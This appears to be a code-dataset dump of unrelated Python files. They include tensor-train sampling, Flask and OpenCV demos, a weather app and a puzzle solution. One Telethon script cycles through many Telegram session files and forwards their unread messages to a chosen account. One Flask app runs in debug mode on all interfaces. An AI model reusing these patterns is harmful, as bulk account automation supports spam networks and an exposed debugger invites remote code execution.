pi(x):\n        d = x.shape[1]\n        ans = np.empty_like(x)\n        x0 = x[:, 0]\n        ans[:, 1:] = -x[:, 1:] * np.exp(-2 * b * x0).reshape(-1, 1)\n        ans[:, 0] = -x0/a**2 + b * np.exp(-2 * b * x0) * (x[:, 1:]**2).sum(axis=1) - (d-1)*b\n        
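# gradient of the funnel log-density: the first coordinate couples to all the others\n        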
return ans\n    return pi\n\n# 6.3 -> 1.1588 -> 3.1588\n#d = 10\n#mu = np.zeros(d)\n#Sigma = np.eye(d)\n#start, end = -10, 10\n#steps = 10000\n#lambdas = np.arange(1, d + 1)\n#cross, alpha = TT_cross_density(\n#    normal_density_general(mu, Sigma), start, end, steps, d, 2\n#)\n\n#ans, pdfs = TT_sampling(cross.to_list(cross), np.random.uniform(size=(2, d)),\n    #start, end, steps, alpha, linear_core_integration)\n\n#print(ans)\n\nclass tensor:\n    def __init__(self, f):\n        self.core = f.core\n        self.ps = f.ps\n        self.n = f.n\n        self.r = f.r\n        self.d = f.d\n\ndef get_centers(a, n, d):\n    cores_coords = np.arange(n)\n    x = a * np.cos(2 * np.pi * cores_coords/n).reshape(-1, 1)\n    y = a * np.sin(2 * np.pi * cores_coords/n).reshape(-1,1)\n    concat = np.concatenate([x, y], axis=1)\n    ans = np.random.uniform(-3, 3, (n, d)) #np.zeros((n, d-2)) # np.random.normal(0, 0.2, (n, d-2)) #\n    #ans = np.concatenate([concat, w], axis=1)\n    return ans\n\nif __name__ == '__main__':\n    n_steps = 1\n    dist = \"Funnel\"\n    d = 30\n    a = 5.0\n    b = 0.02\n    num_centers = 50\n    sigma = 0.2\n    mus = get_centers(5., num_centers, d)\n    Sigmas = [sigma * np.eye(d)] * len(mus) #np.array([[2,0,0,1],[0,2,0,0],[0,0,2,0],[1,0,0,2]])\n    target = Banana(a, b) # normal_density_general(np.zeros(d), Sigma) #\n    #target1 = Funnel(a=a, b=b, dim=d)\n\n\n\n\n\n    dots = [(-4., 6.)] * d\n    dots[0] = (-15, 15)\n    steps = [50] * d\n    #lambdas = np.arange(1, d + 1)\n\n\n    #grid = np.linspace(dots[0][0], dots[0][1], steps[0])\n    #dens = tt.vector.from_list([np.exp(-grid**2/(2 * a**2 * d/4)).reshape(1,-1,1)])\n    #y = dens\n    #for i in range(1, d):\n    #    grid = np.linspace(dots[i][0], dots[i][1], steps[i])\n    #    dens = tt.vector.from_list([np.exp((grid - 1) ** 2 / (2 * a ** 2 * d / 4)).reshape(1,-1,1)])\n    #    y = tt.kron(y, dens)\n\n    #grid = np.zeros(steps[0], dtype=float).reshape(1,-1,1)\n    #grid[:, 850,:] = 1.\n    domain = make_meshgrids_lin(dots, d, steps)\n    cross = TT_cross_density1(domain, target)\n    print(cross)\n    #lists = cross.to_list(cross)\n    ans, pdfs = SIRT_sampling(cross.cores, torch.rand(size=(2000, d)),\n                              domain)\n    #np.save(f'ans{d}.npy', ans)\n    #ans, accs = mala(ans, log_grad_Funnel1(a, b), Funnel1(a, b), 0.3, k=0)\n    plt.scatter(ans[:, 0].numpy(), ans[:, 1].numpy())\n    #plt.title(f'sqrt Sampling, d={d}')\n    #plt.scatter(mus[:, 0], mus[:, 1], c='yellow', label='centers')\n    #plt.legend()\n    plt.show()\n    #plt.scatter(ans[])\n    #print(ans)\n\n","repo_name":"mac-mvak/VR_IS","sub_path":"torch_sirt.py","file_name":"torch_sirt.py","file_ext":"py","file_size_in_byte":8138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11394550802","text":"from flask import Flask, render_template, request, g\n\nimport os\nfrom SQLiteOp import connect_db\n\napp = Flask(__name__)\n\n\n# called before each request\n@app.before_request\ndef before_request():\n    g.db = connect_db()\n\n\n# called after each request, once the response is done\n@app.teardown_request\ndef teardown_request(exception):\n    g.db.close()\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n    sqlstr = 'select * from stus'\n    cur = g.db.execute(sqlstr)\n    stus = []\n    for row in cur.fetchall():\n        print(row[0], row[1], row[2])\n        dic = dict(no=row[1], name=row[2])\n        stus.append(dic)\n    print('stus', stus)\n    # render the template\n    return render_template(\"stulist.html\", title=\"Student List\", stus=stus)\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=80, 
debug=True)\n","repo_name":"dian-zhang/PythonProject","sub_path":"Week11andWeek12/webapp/stulist.py","file_name":"stulist.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25009587638","text":"import os\nimport traceback\n\nimport numpy as np\nimport cv2\n\n# resize_img and std_img are helper functions assumed to be defined elsewhere in this module;\n# the per-file loop restores the iteration this fragment depends on, and the 'shape'\n# parameter (0 = square, 1 = portrait, otherwise landscape) is an assumed addition.\ndef load_dataset2(img_dir, categories, new_size = None, standardize = True, fit_new_shape = False, shape = 0):\n    if not os.path.isdir(img_dir): # check if the init_dir exist or not\n        return [], []\n    \n    image_file_info = []\n    for root, dirs, files in os.walk(img_dir):\n        image_file_info.extend([ (root, f) for f in files if f.endswith('.jpg') ])\n\n    images, labels = [], []\n    for image_dir, image_file_name in image_file_info:\n        folder_name = os.path.basename(image_dir)\n        try:\n            # img01 = cv2.imread(os.path.join(image_dir, image_file_name)) # type of img01 = 'numpy.ndarray'\n\n            # alternative way for reading the image if the file path contains Chinese characters. !!!\n            img01 = cv2.imdecode(np.fromfile(os.path.join(image_dir, image_file_name), dtype = np.uint8), -1)\n            if img01 is None:\n                print(f\"img01 is None !! { os.path.join(image_dir, image_file_name) }\")\n                continue\n            \n            if img01.ndim != 3:\n                print(f\"img01.ndim != 3 !! { img01.shape }, { os.path.join(image_dir, image_file_name) }\")\n                continue\n\n            # if True, keep only the requested shape: square, height > width, or height < width\n            if fit_new_shape: \n                if shape == 0: # want a square image; skip otherwise\n                    if img01.shape[0] != img01.shape[1]: \n                        continue\n                elif shape == 1: # want height > width; skip otherwise\n                    if img01.shape[0] <= img01.shape[1]: \n                        continue\n                else: # want height < width; skip otherwise\n                    if img01.shape[0] >= img01.shape[1]: \n                        continue\n            \n            #print(f\"{ img01.shape }, { os.path.join(image_dir, image_file_name) }\")\n\n            img02 = resize_img(img = img01, new_height = new_size[0], new_width = new_size[1])\n            img02 = img02.astype('float32')\n            img03 = std_img(img02) if standardize else img02\n            if img03 is None:\n                continue\n            else:\n                images.append(img03)\n                label = categories[folder_name.upper()]\n                labels.append(label)\n        except:\n            ex = traceback.format_exc()\n            print(ex) # log the error\n\n    return images, labels\n","repo_name":"chinghancheng/4th-DL-CVMarathon","sub_path":"Homework/final_exam/utils/image_utils.py","file_name":"image_utils.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32284109015","text":"from matplotlib import pyplot as plt\nimport cv2\nimport numpy as np\n\nimg = cv2.imread('lena.jpg', -1)\ncv2.imshow('image', img)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # converts BGR to RGB\n\nplt.imshow(img)\nplt.xticks([]) # hide the x axis ticks on the plt image\nplt.yticks([]) # hide the y axis ticks on the plt image\nplt.show()\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"Drom0s137/OpenCVBasicFunctions","sub_path":"matplotlib implementation.py","file_name":"matplotlib implementation.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11030206403","text":"import json\nfrom flask import Flask, request, render_template\nimport requests\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n    if request.method == 'POST':\n        # User submits location\n        if 'location' not in request.form:\n            return render_template('index.html', error='Please enter a location')\n        location = request.form['location']\n\n        # Make API call to OpenMeteo geocoding API\n        url = f\"https://geocoding-api.open-meteo.com/v1/search?name={location}&language=en&count=1&format=json\"\n        
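# fetch coordinates from the geocoding API; an unknown location will make the ['results'][0] lookups below raise\n        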
response = requests.get(url)\n        data = response.json()\n\n        # Extract latitude and longitude coordinates from response\n        lat = str(data['results'][0]['latitude'])\n        lon = str(data['results'][0]['longitude'])\n\n        # Make API call to OpenMeteo weather API to get forecast data\n        url = f\"https://api.open-meteo.com/v1/forecast?latitude={lat}&longitude={lon}&hourly=temperature_2m,precipitation_probability,uv_index&current_weather=true&temperature_unit=fahrenheit&timezone=America%2FNew_York\"\n        response = requests.get(url)\n        data = response.json()\n\n        # Extract the hourly forecast data\n        forecast = []\n        for i in range(len(data['hourly']['time'])):\n            date = data['hourly']['time'][i]\n            temp = data['hourly']['temperature_2m'][i]\n            precip = data['hourly']['precipitation_probability'][i]\n            uv = data['hourly']['uv_index'][i]\n            forecast.append({'date': date, 'temp': temp, 'precip': precip, 'uv': uv})\n\n        location = location.title()\n        print(location)\n\n        # print(forecast)\n        # Render forecast template with forecast data\n        return render_template('forecast.html', location=location, forecast=json.dumps(forecast))\n\n    # Render home template if no location submitted\n    return render_template('index.html')\n\nif __name__ == '__main__':\n    app.run(port=5000, debug=True)","repo_name":"smquadrat/weather-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11922457924","text":"import cv2\r\ncapture = cv2.VideoCapture(\"videos/CC.mp4\") #It takes either integer arguments when you have a webcam (0) or path of the video\r\n#We will make a loop to loop on each frame of the video and read it\r\nwhile True:\r\n    isTrue, frame = capture.read() #The capture will read frame by frame and store it in frame variable and isTrue to check if it was read successfully or not.\r\n    cv2.imshow(\"Coffee\", frame) #This will show frame by frame.\r\n    if cv2.waitKey(0) & 0xFF==ord('d'): #This breaks out of the loop when d is pressed (Stop Video)\r\n        break\r\ncapture.release() #Release the capture device once, after the loop ends\r\ncv2.destroyAllWindows() #Destroy All Windows\r\n#-215 Assertion Failed means that opencv cannot find media files in this location; for videos it also means no frames are found after the last frame, so the loop breaks out automatically","repo_name":"salmayasserahmed/OpenCV-Python","sub_path":"Basics/ReadVideo.py","file_name":"ReadVideo.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"40264058573","text":"#User function Template for python3\n\nclass Solution:\n    def solve(self, X, Y, S):\n        #code here\n        # X - pr(String s1), Y - rp(String s2)\n        s1=\"pr\"\n        s2=\"rp\"\n        # decide which has greater cost: remove the costlier pair first,\n        # so swap the costs and the target substrings when X is smaller\n        if(X < Y):\n            X, Y = Y, X\n            s1, s2 = s2, s1\n        ans = 0\n        # st is used as a character stack (the Java original used Stack<Character>)\n        st=[]\n        for i in range(len(S)-1,-1,-1):\n            curr=S[i]\n            first = s1[0]\n            second= s1[1]\n            if(len(st)>0 and curr==first and st[-1]==second):\n                st.pop()\n                ans+=X\n            else:\n                st.append(curr)\n        S=\"\"\n        while(len(st)>0):\n            S+=st.pop()\n        #in rem string check for the other cost Y, if any instances present , remove them now\n        for i in range(len(S)-1,-1,-1):\n            curr=S[i]\n            first = s2[0]\n            second= s2[1]\n            if(len(st)>0 and curr==first and st[-1]==second):\n                st.pop()\n                ans+=Y\n            else:\n                st.append(curr)\n        return ans\n\n","repo_name":"ayann01/GFG-POTD","sub_path":"22 March, 2023/String rp or 
pr.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14631478974","text":"# -*- coding: utf-8 -*-\nimport vovp\nimport torch as th\nimport multiprocessing as mp\n\ndef subprocess_client(queue):\n import vovp, logging\n import torch as th\n \n try:\n results = []\n client = vovp.init_client(\"/tmp/dgl_socket\")\n ret_sub = client.get_tensor('asdasd')\n cmp_a = th.tensor([[1, 2, 3], [5, 4, 6]])\n results.append(th.equal(ret_sub, cmp_a))\n queue.put(results)\n except Exception as e:\n logging.info('General exception noted.', exc_info=True)\n queue.put(e)\n\n\ndef test_basic_client():\n client = vovp.init_client(\"/tmp/dgl_socket\")\n a = th.tensor([[1, 2, 3], [5, 4, 6]])\n ret_a = client.put_tensor(\"asdasd\", a)\n ret_b = client.get_tensor('asdasd')\n ctx = mp.get_context('spawn')\n queue = ctx.Queue()\n p = ctx.Process(target=subprocess_client, args=(queue, ))\n p.start()\n p.join()\n ret_list = queue.get()\n for ret in ret_list:\n assert ret\n\nif __name__==\"__main__\":\n test_basic_client()\n","repo_name":"VoVAllen/vovp","sub_path":"tests/test_mp.py","file_name":"test_mp.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12890927862","text":"def solution(command):\n answer = [0]*2 #x,y\n R=0\n L=0 #R,L의 횟수를 체크\n R_L=(R-L)%4\n case=[0,1,2,3]\n \n for i in command:\n if i==\"G\":\n if case[R_L]==0:\n answer[1]+=1\n elif case[R_L]==1:\n answer[0]+=1\n elif case[R_L]==2:\n answer[1]-=1\n else :\n answer[0]-=1\n elif i==\"B\":\n if case[R_L]==0:\n answer[1]-=1\n elif case[R_L]==1:\n answer[0]-=1\n elif case[R_L]==2:\n answer[1]+=1\n else:\n answer[0]+=1\n \n elif i==\"R\":\n R+=1\n else: #i==\"L\"\n L+=1\n R_L=(R-L)%4\n #print(answer,R,L)\n \n \n return answer\nprint(solution(\"GRGLGRG\"))\n\n\n#풀이 길이를 줄인 방식\n\"\"\"def solution(command):\n answer = [0,0]\n dxy=[[0,1],[1,0],[0,-1],[-1,0]]\n d=0\n for i in command:\n if i==\"G\":\n answer[0]=answer[0]+dxy[d][0]\n answer[1]=answer[1]+dxy[d][1]\n elif i==\"B\":\n answer[0]=answer[0]-dxy[d][0]\n answer[1]=answer[1]-dxy[d][1]\n elif i==\"R\":\n d+=1\n d=d%4\n else:\n d-=1\n d=d%4\n \n return answer\"\"\"","repo_name":"Tigerfriend1/Python_algorithm_practice","sub_path":"python/pccp모의고사2_실습용로봇.py","file_name":"pccp모의고사2_실습용로봇.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1117553814","text":"import datetime\nimport logging\nimport os\nimport random\nimport time\nfrom telethon import TelegramClient\nfrom telethon.errors.rpcerrorlist import PhoneNumberOccupiedError, SessionPasswordNeededError, PhoneNumberBannedError\nfrom telethon import functions, types\nfrom telethon.sync import TelegramClient\nfrom telethon import TelegramClient, events, sync\nfrom datetime import datetime, timedelta\n\ndatetime.now()\nOVERALL_COUNTER = 0\nDEAD_SESSIONS = 'lists/dead_sessions.txt'\nADMIN_USER = input(\"write down the username you want to recieve the messages\")\nTARGET_GROUP_LINK_SELECTOR = 0\n\nAPP_ID_CODE = []\nAPP_ID = []\nSESSION_LIST = []\nDATE_LIST = []\n\nlogging.basicConfig(level=logging.DEBUG, format='%(message)s', filename='lists/logs/update_sessions.log')\n\n\ndef file_open(file_name):\n with open(file_name, 'r') as file:\n data = file.read()\n lst_of_data = data.split('\\n')\n for i_data in lst_of_data:\n app_id, app_code = i_data.split(' 
')\n APP_ID_CODE.append(app_code)\n APP_ID.append(app_id)\n logging.info(APP_ID)\n logging.info(APP_ID_CODE)\n\n\nfile_open(\"lists/app_id.txt\")\n\nTELEGRAM_SELECTOR = 0\n\nall_sessions = [x for x in os.listdir('.') if 'session' in x]\n\nfor session in all_sessions:\n print(format(OVERALL_COUNTER)+'. '+session)\n OVERALL_COUNTER += 1\n if session in open(DEAD_SESSIONS).read():\n print(\"already found dead\")\n continue\n\n TELEGRAM_SELECTOR = random.randrange(0, len(APP_ID))\n logging.info(datetime.now().time())\n logging.info(session)\n # print(session)\n logging.info(APP_ID[TELEGRAM_SELECTOR])\n client = TelegramClient(session, APP_ID_CODE[TELEGRAM_SELECTOR], APP_ID[TELEGRAM_SELECTOR])\n\n try:\n client.connect()\n # file = open(\"sessions_count/\"+session, \"w\") \n # file.write('1') \n # file.close()\n except Exception as e:\n print(e)\n\n continue\n\n if not client.is_user_authorized():\n print('{} is dead'.format(session))\n # if not client.get_me():\n # f = open(DEAD_SESSIONS, \"a\")\n # f.write(session)\n # f.write('\\n')\n # f.close()\n # print('{} is dead'.format(session))\n # client.disconnect()\n\n # time.sleep(1.1)\n logging.info(datetime.now().time())\n continue\n\n try:\n \n #offset_date = datetime.now() + timedelta(days=-1) # Here, I am adding a negative timedelta\n \tfor dialog in client.get_dialogs(offset_date=datetime.now() + timedelta(days=-1)):\n if dialog.unread_count:\n print(format(dialog.name+', '))\n print(format(dialog.entity.username)+', ')\n print(format(dialog.entity.phone)+', ')\n print(format(dialog.date))\n print(format(dialog.message.message)+', ')\n print('\\n')\n try:\n client.send_message(ADMIN_USER,'שם: '+format(dialog.name)+'\\nיוזר: '+format(dialog.entity.username)+'\\nטלפון: '+format(dialog.entity.phone)+'\\nתאריך/שעה: '+format(dialog.date)+'\\nהודעה: '+format(dialog.message.message))\n client.send_read_acknowledge(dialog.entity.id, dialog.message)\n except Exception as e:\n print(e)\n continue\n except Exception as e:\n print(e)\n continue\n\n time.sleep(0.3)\n client.disconnect()\n","repo_name":"JacobZoarets/tgAdminCode","sub_path":"7.session_replies.py","file_name":"7.session_replies.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25958773015","text":"# -*- coding: utf-8 -*-\r\n# Version:\t\tpython 3.6.5\r\n# Description:\t\r\n# Author:\t\tbqrmtao@qq.com\r\n# date:\t\t\t2019/12/26\r\n\r\nfrom __future__ import absolute_import, print_function\r\n\r\nimport os\r\nimport torch\r\n\r\nfrom tqdm import tqdm\r\n\r\nfrom dataloader import make_data_loader\r\nfrom modeling.backbone import build_backbone\r\nfrom utils.dict_object import DictToObject\r\nfrom utils.evaluator import Evaluator\r\n\r\n\r\nclass FCN(torch.nn.Module):\r\n def __init__(self, layer_config, num_class, is_training):\r\n super(FCN, self).__init__()\r\n\r\n if layer_config in [\"32s\", \"16s\", \"8s\", \"s\"]:\r\n self.layer_config = layer_config\r\n else:\r\n raise ValueError(\"layer_config should be one of [\\\"32s\\\", \\\"16s\\\", \\\"8s\\\", \\\"s\\\"]\")\r\n\r\n self.num_class = num_class\r\n self.is_training = is_training\r\n\r\n kwargs = {\r\n \"num_class\": num_class,\r\n \"with_bn\": False,\r\n \"is_training\": is_training,\r\n \"with_fc\": False,\r\n \"init_weights\": True,\r\n \"verbose\": False,\r\n }\r\n self.vgg_model = build_backbone(\"vgg\", **kwargs)\r\n self._make_transpose_conv()\r\n\r\n def _make_transpose_conv(self):\r\n self.relu = 
torch.nn.ReLU(inplace=True)\r\n self.deconv_1 = torch.nn.ConvTranspose2d(512, 512, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.deconv_2 = torch.nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.deconv_3 = torch.nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.deconv_4 = torch.nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.deconv_5 = torch.nn.ConvTranspose2d(64, 32, kernel_size=3, stride=2, padding=1, output_padding=1)\r\n self.bn_1 = torch.nn.BatchNorm2d(512)\r\n self.bn_2 = torch.nn.BatchNorm2d(256)\r\n self.bn_3 = torch.nn.BatchNorm2d(128)\r\n self.bn_4 = torch.nn.BatchNorm2d(64)\r\n self.bn_5 = torch.nn.BatchNorm2d(32)\r\n self.classifier = torch.nn.Conv2d(32, self.num_class, kernel_size=1)\r\n\r\n def forward(self, x):\r\n output = self.vgg_model(x)\r\n\r\n x5 = output['x5']\r\n score = self.bn_1(self.relu(self.deconv_1(x5)))\r\n\r\n if self.layer_config in [\"16s\", \"8s\", \"s\"]:\r\n score += output['x4']\r\n\r\n score = self.bn_2(self.relu(self.deconv_2(score)))\r\n\r\n if self.layer_config in [\"8s\", \"s\"]:\r\n score += output['x3']\r\n\r\n score = self.bn_3(self.relu(self.deconv_3(score)))\r\n\r\n if \"s\" == self.layer_config:\r\n score += output['x2']\r\n\r\n score = self.bn_4(self.relu(self.deconv_4(score)))\r\n\r\n if \"s\" == self.layer_config:\r\n score += output['x1']\r\n\r\n score = self.bn_5(self.relu(self.deconv_5(score)))\r\n score = self.classifier(score)\r\n\r\n return score\r\n\r\n\r\ndef test(model, criterion, data_loader, evaluator, use_cuda=False):\r\n test_loss = 0\r\n\r\n evaluator.reset()\r\n\r\n model.eval()\r\n\r\n iter_bar = tqdm(data_loader)\r\n for batch_index, batch_sample in enumerate(iter_bar, 1):\r\n sample, target = batch_sample[\"image\"], batch_sample[\"label\"]\r\n\r\n if use_cuda:\r\n sample = sample.cuda()\r\n target = target.cuda()\r\n\r\n output = model(sample)\r\n test_loss += criterion(output, target.long()).data\r\n pred = output.data.max(1)[1] # get the index of the max log-probability\r\n iter_bar.set_description(\"testing loss: %.3f\" % (test_loss / batch_index))\r\n evaluator.add_batch(target.cpu().numpy(), pred.cpu().numpy())\r\n\r\n acc = evaluator.pixel_accuracy()\r\n acc_class = evaluator.pixel_accuracy_class()\r\n miou = evaluator.mean_intersection_over_union()\r\n fwiou = evaluator.frequency_weighted_intersection_over_union()\r\n\r\n print(\"\\tAcc:{},\\n\\tAcc_class:{},\\n\\tmIoU:{},\\n\\tfwIoU: {}\".format(acc, acc_class, miou, fwiou))\r\n\r\n\r\ndef train(model, epoch, criterion, optimizer, data_loader, use_cuda=False):\r\n total_loss = 0\r\n model.train()\r\n\r\n iter_bar = tqdm(data_loader)\r\n for batch_index, batch_sample in enumerate(iter_bar, 1):\r\n sample, target = batch_sample[\"image\"], batch_sample[\"label\"]\r\n\r\n if use_cuda:\r\n sample = sample.cuda()\r\n target = target.cuda()\r\n\r\n output = model(sample)\r\n optimizer.zero_grad()\r\n\r\n loss = criterion(output, target.long())\r\n loss.backward()\r\n\r\n optimizer.step()\r\n\r\n total_loss += loss\r\n iter_bar.set_description(\"training epoch %d loss: %.3f\" % (epoch, total_loss / batch_index))\r\n\r\n\r\ndef main():\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n print(\"using device {}\".format(device))\r\n\r\n args = DictToObject\r\n args.batch_size = 4\r\n args.crop_size = 512\r\n args.dataset = \"pascal\"\r\n args.num_epoch = 300\r\n args.root_dir = 
\"D:/Projects/DataSets/VOCdevkit/VOC2012\"\r\n args.use_sbd = False\r\n kwargs = {'num_workers': 1, 'pin_memory': True}\r\n train_loader, test_loader, _, num_class = make_data_loader(args, **kwargs)\r\n \r\n evaluator = Evaluator(num_class)\r\n criterion = torch.nn.CrossEntropyLoss(ignore_index=255).to(device)\r\n\r\n check_point_name = \"fcn.t7\"\r\n check_point_path = \"../../checkpoint/\"\r\n full_path = os.path.join(check_point_path, check_point_name)\r\n if os.path.exists(full_path):\r\n print(\"loading model\")\r\n\r\n model = FCN(\"s\", num_class, False).to(device)\r\n model.load_state_dict(torch.load(full_path, map_location=lambda storage, loc: storage))\r\n test(model, criterion, test_loader, evaluator, torch.cuda.is_available())\r\n else:\r\n print(\"training model\")\r\n\r\n if not os.path.exists(os.path.dirname(full_path)):\r\n os.makedirs(os.path.dirname(full_path))\r\n\r\n model = FCN(\"s\", num_class, True).to(device)\r\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3, betas=(0.9, 0.99))\r\n\r\n for epoch_idx in range(args.num_epoch):\r\n train(model, epoch_idx, criterion, optimizer, train_loader, torch.cuda.is_available())\r\n\r\n if 0 == epoch_idx % 10:\r\n test(model, criterion, test_loader, evaluator, torch.cuda.is_available())\r\n torch.save(model.state_dict(), full_path)\r\n\r\n torch.save(model.state_dict(), full_path)\r\n\r\n\r\nif \"__main__\" == __name__:\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bqrm/deep.learning_pytorch","sub_path":"modeling/segmentation/fcn.py","file_name":"fcn.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10056041773","text":"import torch\n\n\n__all__ = [\n \"AVOLinearModelling\",\n]\n\n\ndef _akirichards(theta, vsvp, n=1):\n theta = torch.deg2rad(theta)\n vsvp = vsvp * torch.ones(n) if not isinstance(vsvp, torch.Tensor) else vsvp\n \n theta = theta[:, None] if vsvp.numel() > 1 else theta\n vsvp = vsvp[:, None].T if vsvp.numel() > 1 else vsvp\n \n c2 = torch.cos(theta) ** 2\n s2 = torch.sin(theta) ** 2\n \n G1 = 1. / (2. * c2) + 0 * vsvp\n G2 = -4. * vsvp ** 2 * s2\n G3 = 0.5 - 2. * vsvp ** 2 * s2\n \n return G1, G2, G3\n\n\ndef _fatti(theta, vsvp, n=1):\n theta = torch.deg2rad(theta)\n vsvp = vsvp * torch.ones(n) if not isinstance(vsvp, torch.Tensor) else vsvp\n \n theta = theta[:, None] if vsvp.numel() > 1 else theta\n vsvp = vsvp[:, None].T if vsvp.numel() > 1 else vsvp\n \n t2 = torch.tan(theta) ** 2\n s2 = torch.sin(theta) ** 2\n \n G1 = 0.5 * (1. + t2) + 0 * vsvp\n G2 = -4. 
* vsvp ** 2 * s2\n    G3 = 0.5 * (4 * vsvp ** 2 * s2 - t2)\n    \n    return G1, G2, G3\n\n\nclass AVOLinearModelling(torch.nn.Module):\n    \n    def __init__(self, theta, vsvp=0.5, nt0=1, spatdims=None, linearization='akirich'):\n        \n        super(AVOLinearModelling, self).__init__()\n        \n        self.nt0 = nt0 if not isinstance(vsvp, torch.Tensor) else len(vsvp)\n        self.ntheta = len(theta)\n        \n        if spatdims is None:\n            self.spatdims = ()\n        else:\n            self.spatdims = spatdims if isinstance(spatdims, tuple) else (spatdims,)\n        \n        # Compute AVO coefficients\n        if linearization == \"fatti\":\n            self.G = torch.stack([gs for gs in _fatti(theta, vsvp, n=self.nt0)], dim=1)\n        else:\n            self.G = torch.stack([gs for gs in _akirichards(theta, vsvp, n=self.nt0)], dim=1)\n        \n        # add dimensions to G to account for horizontal axes\n        for _ in range(len(self.spatdims)):\n            self.G = self.G.unsqueeze(-1)\n        \n    def forward(self, x):\n        \"\"\"\n        from model to data\n\n        3 channels -> ntheta channels\n        \"\"\"\n        if self.G.device != x.device:\n            self.G = self.G.to(x.device)\n        # G is (ntheta, 3, nt0, spatdims)\n        # x is (1, 3, nt0, spatdims)\n        # the output has to be (1, ntheta, nt0, spatdims)\n        y = torch.sum(self.G * x, dim=1).unsqueeze(0)\n        \n        return y\n    \n    def adjoint(self, y):\n        \"\"\"\n        from data to model\n\n        ntheta channels -> 3 channels\n        \"\"\"\n        if self.G.device != y.device:\n            self.G = self.G.to(y.device)\n        # G is (ntheta, 3, nt0, spatdims)\n        # y is (1, ntheta, nt0, spatdims)\n        # the output has to be (1, 3, nt0, spatdims)\n        x = torch.sum(self.G * y.transpose(0, 1), dim=0).unsqueeze(0)\n        \n        return x\n","repo_name":"polimi-ispl/deep_prior_interpolation","sub_path":"operators/avo.py","file_name":"avo.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"}
+{"seq_id":"72021257129","text":"import sys\nfrom collections import defaultdict\nN = int(sys.stdin.readline())\nrec = defaultdict(int) # how many times each direction appears\ndir = [] # order of the directions\nlength = [] # order of the lengths\nn = [] # directions that hold the true side lengths of the rectangle\nindex = [0,0,0,0] # indices of the big rectangle's true width/height\n                  # and of the cut-out rectangle's width/height\n\n# read the input values\nfor i in range(6):\n    a,b = map(int,sys.stdin.readline().split())\n    rec[a]+=1\n    dir.append(a)\n    length.append(b)\n\n# find the width/height of the rectangle before the cut\nfor i in range(1,5):\n    if(rec[i] == 1):\n        n.append(i)\n\n# four cases\nk = n[0]*n[1]\nif(k==3):\n    for i in range(6):\n        if(dir[i] == 1):\n            index[0]=i\n        elif(dir[i] == 3):\n            index[1]=i\n\nelif(k==4):\n    for i in range(6):\n        if(dir[i] == 4):\n            index[0]=i\n        elif(dir[i] == 1):\n            index[1]=i\n\nelif(k==6):\n    for i in range(6):\n        if(dir[i] == 3):\n            index[0]=i\n        elif(dir[i] == 2):\n            index[1]=i\n\nelse:\n    for i in range(6):\n        if(dir[i] == 2):\n            index[0]=i\n        elif(dir[i] == 4):\n            index[1]=i\n\n# find the indices of the cut-out rectangle's sides\nindex[2] = (index[0]+2)%6\nindex[3] = (index[0]+3)%6\n\n# compute the answer\n\nans = (length[index[0]]*length[index[1]]-length[index[2]]*length[index[3]])*N\nprint(ans)\n","repo_name":"Youngini/baekjoon","sub_path":"baek2477_py.py","file_name":"baek2477_py.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
